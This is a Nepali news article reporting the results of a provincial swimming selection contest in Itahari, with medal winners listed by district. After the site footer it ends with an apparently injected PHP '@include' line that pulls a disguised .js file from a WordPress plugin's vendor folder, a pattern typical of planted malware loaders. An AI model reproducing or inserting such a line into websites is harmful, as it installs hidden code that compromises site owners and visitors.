पौडीमा संखुवासभाका विकासलाई तीन स्वर्ण, महिला तर्फ धनकुटाकी वियुशा राईलाई दुई स्वर्ण 

२०७९, ३१ भाद्र शुक्रबार
इटहरी- सुनसरीको इटहरीमा बिहिबार सम्पन्न भएको प्रदेश एक स्तरिय पौडिको छनौट प्रतियोगितामा संखुवासभाका विकास कुमालले तीन स्वर्ण जितेका छन् ।
पुरुष र महिला तर्फ फरक फरक भएको प्रतियोगितामा १५ जना पुरुष र १० जना महिला खेलाडी सहभागि भएका थिए । आगामी असोज २८ गतेदेखि कार्तिक ३ गतेसम्म गण्डकी प्रदेशमा हुने नवौँ राष्ट्रिय खेलकुद प्रतियोगिताको लागि सुनसरीको इटहरी स्थित ओसियन पार्कमा भएको छनौट खेलबाट पुरुष तर्फ विकास कुमालले २ तीन स्वर्ण पदक जितेका हुन ।
पौडी खेलको छनौट समिति सदस्य इन्द्रजीत राजवंशीका अनुसार मोरङ्ग  का संस्कार ढकालले एक गोल्ड र तीन सिल्भर पदक प्राप्त गरेका छन् भने भोजपुरका  ससाहाङ्ग राईले तीन वटा ब्रोन्ज मेडल पाएका छन् । छनौट प्रतियोगिताबाट मोरङ्ग  का अजय सोरेनले एक ब्रोन्ज मेडल पाएका छन् भने  मोरङ्गकै आयुस लामाले एक सिल्भर मेडल पाएका छन् ।
सय मिटरका फ्रि स्टायल, ब्रेस्ट स्टोक , व्याक स्टोक र बटरफ्लाई बिद्यामा प्रतिस्पर्धा गराएको पौडीका संयोजक दिपक राई बताउँछन् ।
यसैगरी महिला तर्फको प्रदेश स्तरिय पौडी प्रतियोगितामा धनकुटाकी  बिभुषा राईले दुई गोल्ड मेडल जितेकी छन् । राईले सय मिटर फ्रि स्टायल र बे्रस्ट स्कोकमा स्वर्ण जितेकी हुन भने दुवै विद्यामा मोरङ्गकी उपाशना राईले सिल्भर मेडल पाएकि छन् । यता भोजपुरकी सिसुवुनु राईले दुवै विदामा ब्रोन्ज मेडल पाइन ।  महिला तर्फको सय मिटर व्याक स्टोकमा सिसुवुनु राईले स्वर्ण जितेकि छन् भने मोरङ्गका आर्विया पौद्धारले सिल्भर र सिरिम प्रसाईले ब्रोन्ज मेडल जितेकी छन् ।
पौडीमा बिभिन्न ८ जिल्लाका खेलाडीहरु प्रदेश स्तरिय छनौट प्रतियोगितामा सहभागि भएका थिए ।

फेसबुक प्रतिक्रिया

सम्बन्धित शीर्षकहरु

website design & develop by thakuricreation Pvt. Ltd.

@include "wp-content/plugins/ad-inserter/includes/google-api-8/vendor/composer/include/7025.js";